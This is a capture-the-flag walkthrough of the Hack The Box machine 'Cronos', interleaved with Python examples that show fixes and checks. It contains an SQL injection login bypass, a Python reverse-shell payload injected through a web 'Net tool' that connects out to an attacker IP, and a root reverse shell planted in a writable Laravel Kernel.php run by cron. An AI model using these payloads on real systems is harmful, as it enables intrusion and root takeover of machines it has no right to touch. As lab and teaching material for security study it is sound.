Cronos

This time we are solving Cronos from Hack The Box! I really enjoyed this box, no bullshit parts in my opinion, so let's get started!

First off, let's run nmap against the target:

mkdir nmap
sudo nmap -sC -sV -oA nmap/ -T4 10.129.30.241

Here we can see the result (screenshot of the nmap output).

Ports 22, 53 and 80 are open. Let's ignore port 22 for now, since we usually need credentials or an SSH key before SSH is of any use. Port 53 is the interesting one: the target runs its own DNS server, which is a strong hint that name-based virtual hosts are in play and that we will need hostnames rather than just the IP to see everything the web server offers. Let's check the web app on port 80!

(screenshot: the stock Apache2 Ubuntu default page)

Not much to go on. I started gobuster in the background, but I also added cronos.htb to my /etc/hosts file, since .htb is the usual domain on HTB machines. So let's add that entry! Type:

  sudo nano /etc/hosts

in the terminal and add a line mapping the target IP (10.129.30.241 here) to cronos.htb. This matters because the browser sends that name in the Host header, and the server decides which site to serve based on it.

(screenshot: the new /etc/hosts entry)

We should also run gobuster in vhost mode to reveal more virtual hosts. We can do that with the command:

gobuster vhost -u http://cronos.htb/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000.txt

In vhost mode every candidate name is sent as a Host header to the same IP, and gobuster reports names for which the server answered differently from its baseline. False positives happen, so compare the reported response sizes. From the results we find a new vhost:

(screenshot: gobuster vhost results showing admin.cronos.htb)

Sweet, we add that entry to our /etc/hosts file too, and the file should now look something like this:

(screenshot: final /etc/hosts with both cronos.htb and admin.cronos.htb)
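To make the vhost mechanic concrete, here is an added example (not part of the original walkthrough, and not gobuster's code) that stands up a small local stand-in for the target on 127.0.0.1 with two name-based virtual hosts and then fuzzes it the way gobuster vhost does: every candidate goes to the same IP with a different Host header, a baseline is measured with a random name that cannot exist, and anything that answers differently is reported. The vhost names and page bodies are constructed for the demo.

```python
import secrets
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler
from socketserver import TCPServer

# Constructed stand-in for the target web server: one IP address, and the body it
# returns depends only on the Host header the client sends (name-based virtual hosting).
VHOSTS = {
    "cronos.htb": b"<html><body>Cronos main site</body></html>",
    "admin.cronos.htb": b"<html><body><form>admin login</form></body></html>",
}
DEFAULT_BODY = b"<html><body>Apache2 Ubuntu Default Page</body></html>"


class VhostHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        name = self.headers.get("Host", "").split(":")[0]
        body = VHOSTS.get(name, DEFAULT_BODY)   # unknown name -> default site
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_fake_target():
    """Bind the stand-in server on a random loopback port and serve it in the background."""
    TCPServer.allow_reuse_address = True
    srv = TCPServer(("127.0.0.1", 0), VhostHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe(ip, port, hostname):
    """GET / from the IP with an explicit Host header; return the body length,
    which is the cheap fingerprint gobuster compares."""
    req = urllib.request.Request(f"http://{ip}:{port}/", headers={"Host": hostname})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return len(resp.read())


def fuzz_vhosts(ip, port, domain, words):
    """Measure a baseline with a name that cannot exist, then report every
    candidate <word>.<domain> whose response differs from it."""
    baseline = probe(ip, port, f"{secrets.token_hex(8)}.{domain}")
    hits = []
    for word in words:
        candidate = f"{word}.{domain}"
        if probe(ip, port, candidate) != baseline:
            hits.append(candidate)
    return hits


if __name__ == "__main__":
    srv = start_fake_target()
    ip, port = srv.server_address
    print(fuzz_vhosts(ip, port, "cronos.htb", ["www", "admin", "mail", "dev"]))
    srv.shutdown()
```

Because the fingerprint is just the body length, a site that returns slightly different content on each request (timestamps, CSRF tokens) will show up as a hit for every candidate; that is the false-positive case mentioned above, and it is why looking at the reported sizes before adding names to /etc/hosts is worth the few seconds.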

Now when we visit those names in the browser we see two different web apps! We're going to skip cronos.htb for now since it (SPOILER ALERT) contains nothing useful (YET). admin.cronos.htb, on the other hand, has a login form. I tried logging in with some random credentials and even brute forced with small wordlists, with no luck. Happily, the username field is vulnerable to SQL injection. The single quote closes the string literal the app built around our input, OR 1 = 1 makes the WHERE clause true for every row, and -- - comments out the rest of the query, including the password check. So we enter the username as:

  admin ' OR 1 = 1 -- -

and leave the password field empty. Neat, we got in! Now there is some kind of "Net tool" on the page that runs network commands for us. As soon as I saw the form I knew there would be a way to execute arbitrary commands on the system. And I was right! We can do this by intercepting the request with Burp Suite. Before we do that, let's set up a netcat listener:
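The login bypass above, as an added example that is not part of the original walkthrough and is not the box's PHP code: a constructed in-memory sqlite table stands in for the admin login backend (the real app most likely talks to MySQL, where the same payload behaves the same way), the vulnerable query is built the way the app evidently builds it, and a parameterised version is shown beside it to make clear why the fix is not "filter quotes".

```python
import sqlite3

# Constructed stand-in for the admin.cronos.htb login backend.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'not-the-real-password')")
    db.commit()
    return db


def render_query(username, password):
    """The SQL text the vulnerable app sends: user input pasted straight into the query."""
    return (f"SELECT username FROM users "
            f"WHERE username = '{username}' AND password = '{password}'")


def login_vulnerable(db, username, password):
    """Returns the matched username, or None. With the payload the WHERE clause is
    'username = 'admin ' OR 1 = 1' and everything after -- is a comment."""
    row = db.execute(render_query(username, password)).fetchone()
    return row[0] if row else None


def login_fixed(db, username, password):
    """Parameterised query: values travel separately from the SQL text, so a quote in
    the username is just a character and the password check cannot be commented out."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


PAYLOAD = "admin ' OR 1 = 1 -- -"   # the username used in the walkthrough

if __name__ == "__main__":
    db = make_db()
    print(render_query(PAYLOAD, ""))
    print("vulnerable:", login_vulnerable(db, PAYLOAD, ""))   # admin
    print("fixed:     ", login_fixed(db, PAYLOAD, ""))        # None
```

The trailing space after -- is what makes the MySQL variant of this payload reliable (MySQL requires whitespace after -- for it to start a comment); the extra dash just makes the space survive trimming.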

  nc -lnvp 9005

Now it's time to intercept the request and modify the POST parameters to contain the ingredients of a reverse shell. The command and host fields are evidently glued together into one shell command line on the server, so we set command to python and put the rest of the command line in host. URL-encode the host value in Burp (select it and press Ctrl+U) so the spaces, quotes and semicolons survive the trip:

(screenshot: the intercepted POST in Burp with the reverse-shell payload)

You can copy the POST params from here (10.10.14.98 is the attacker IP in this walkthrough; replace it with your own VPN address):

command=python&host= -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.98",9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
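What the payload tells us about the Net tool is that both fields end up in a single shell command line, so an allowlist on the command field alone would not have helped as long as host is still interpolated into a shell string. The following is an added illustration (Python, not the box's PHP source, and modelled only on what the payload reveals): the vulnerable shape beside a hardened version that maps each allowed tool to a fixed argv, validates the host as an IP address or hostname, and never goes through a shell. The tool names and the hostname pattern are my assumptions.

```python
import ipaddress
import re
import subprocess


def vulnerable_net_tool(command, host):
    """Runs '<command> <host>' through /bin/sh, the shape the payload abuses:
    command=python plus host=-c '...' becomes one python invocation, and a host
    like '127.0.0.1; echo injected' becomes two commands."""
    proc = subprocess.run(f"{command} {host}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


# Hardened version: fixed argv per allowed tool (assumed tool set), strict host
# validation, and shell=False so the host is only ever a single argument.
ALLOWED = {
    "ping": ["ping", "-c", "1"],
    "traceroute": ["traceroute"],
}
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_argv(command, host):
    """Return the argv the hardened tool would exec, or raise ValueError before
    anything runs."""
    if command not in ALLOWED:
        raise ValueError(f"unknown tool {command!r}")
    try:
        ipaddress.ip_address(host)          # accepts IPv4/IPv6 literals
    except ValueError:
        if not HOSTNAME_RE.match(host):     # otherwise must look like a DNS name
            raise ValueError(f"bad host {host!r}")
    return ALLOWED[command] + [host]


def hardened_net_tool(command, host):
    argv = build_argv(command, host)
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    # The walkthrough's parameters, rendered as the shell line the server runs.
    payload_host = "-c 'import pty; pty.spawn(\"/bin/bash\")'"
    print("server would run:", f"{'python'} {payload_host}")
    print(vulnerable_net_tool("echo", "127.0.0.1; echo injected"), end="")
    for cmd, host in [("python", payload_host), ("ping", "127.0.0.1; echo injected")]:
        try:
            build_argv(cmd, host)
        except ValueError as exc:
            print("rejected:", exc)
    print(build_argv("ping", "10.10.14.98"))
```

Note the ordering in the hardened path: validation happens while building the argv, so a rejected request never reaches subprocess at all, and the argument list form means even a host string containing `;` would be handed to ping verbatim rather than parsed by a shell.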

Aaaand we are in! Let's make this a proper interactive shell real quick:

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg

We already have access to user.txt; it is in the home directory of the user noulis. Now would be a good time to enumerate with linPEAS or LinEnum, but let's skip that and go straight for the solution, shall we? (I found the next step via LinEnum.) The cronos.htb site, which had nothing visible to us earlier, is built with the PHP framework Laravel. Laravel is actually a pretty cool thing; it even makes writing PHP not so horrible :). Anyway, the system has a cron job:

  /bin/sh -c php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1 

which runs Laravel's scheduled commands (the scheduler is meant to be invoked like this every minute). The best part is that the cron job runs as root, AND the Laravel tree under /var/www/laravel is writable by www-data, the user our shell runs as, so we can make root execute whatever we want. Before relying on it, confirm that the files really are owned by or writable for www-data; a root cron job pointing at files you can change is the whole flaw.
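The check just described, as an added example (mine, not from the walkthrough or from LinEnum): parse crontab entries, pull out every absolute path the command references, and flag those that the current user can write to, or whose parent directory is writable (so the file can be replaced). The sample crontab is constructed to resemble the root job found on the box, and the writability oracle is injectable so the logic can be exercised offline; the default oracle is os.access for use on a real target.

```python
import os
import re
import shlex

IGNORE = {"/dev/null"}          # redirect sinks, never something we can abuse
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_cron_line(line, has_user_field=False):
    """Split one crontab entry into (schedule, user, command).

    Returns None for blank lines, comments and VAR=value lines. Set has_user_field
    for /etc/crontab and /etc/cron.d files, which carry a user column after the
    five time fields; per-user crontabs (crontab -l) do not.
    """
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    tokens = line.split()
    n_sched = 1 if tokens[0].startswith("@") else 5      # @reboot, @hourly, ...
    rest = tokens[n_sched:]
    user = None
    if has_user_field and rest:
        user, rest = rest[0], rest[1:]
    if not rest:
        return None
    return " ".join(tokens[:n_sched]), user, " ".join(rest)


def command_paths(command):
    """Absolute paths a cron command touches, tokenised the way sh would see them."""
    try:
        words = shlex.split(command)
    except ValueError:                    # unbalanced quotes: fall back to whitespace
        words = command.split()
    paths = []
    for word in words:
        word = word.lstrip("<>&|;")       # '>>/dev/null' style glued redirections
        if word.startswith("/") and word not in IGNORE:
            paths.append(word)
    return paths


def writable_targets(crontab_text, has_user_field=False,
                     is_writable=lambda p: os.access(p, os.W_OK)):
    """Every (schedule, user, path, reason) where we could influence what cron runs."""
    findings = []
    for line in crontab_text.splitlines():
        parsed = parse_cron_line(line, has_user_field)
        if parsed is None:
            continue
        schedule, user, command = parsed
        for path in command_paths(command):
            parent = os.path.dirname(path.rstrip("/")) or "/"
            if is_writable(path):
                findings.append((schedule, user, path, "file is writable"))
            elif is_writable(parent):
                findings.append((schedule, user, path, "parent directory is writable"))
    return findings


# Constructed sample crontab, shaped like the root crontab behind the job seen on the box.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/sh
* * * * * php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
17 *  * * * cd / && run-parts --report /etc/cron.hourly
"""


def fake_writable(path):
    """Stand-in for os.access on the box: only the Laravel tree belongs to www-data."""
    return path.startswith("/var/www/laravel")


if __name__ == "__main__":
    for hit in writable_targets(SAMPLE_CRONTAB, is_writable=fake_writable):
        print(hit)
    # On a real target: the system crontab (which has a user column) is a good start.
    if os.path.exists("/etc/crontab"):
        with open("/etc/crontab") as fh:
            for hit in writable_targets(fh.read(), has_user_field=True):
                print(hit)
```

The script only sees the entry point (artisan here); anything that entry point loads, such as Kernel.php, deserves the same ownership check, which is exactly the file the walkthrough goes on to edit.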

Let's exploit this flaw by modifying the file that defines Laravel's scheduled commands: /var/www/laravel/app/Console/Kernel.php

We can reuse the reverse-shell technique from earlier. Modify the schedule method of Kernel.php to look like this (note the listener port is 1338 this time):

  protected function schedule(Schedule $schedule)
  {
      // Reverse shell back to the attacker box. schedule() is executed every time
      // cron runs `artisan schedule:run`, and cron runs it as root.
      $command = "python -c'" . 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.98",1338));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' . "'";
      shell_exec($command);

      // $schedule->command('inspire')
      //          ->hourly();
  }

Now set up another netcat listener on our machine and wait for the reverse shell:

nc -lnvp 1338

Within about a minute (the cron job fires every minute) we receive a connection and a shell session as root! Box done!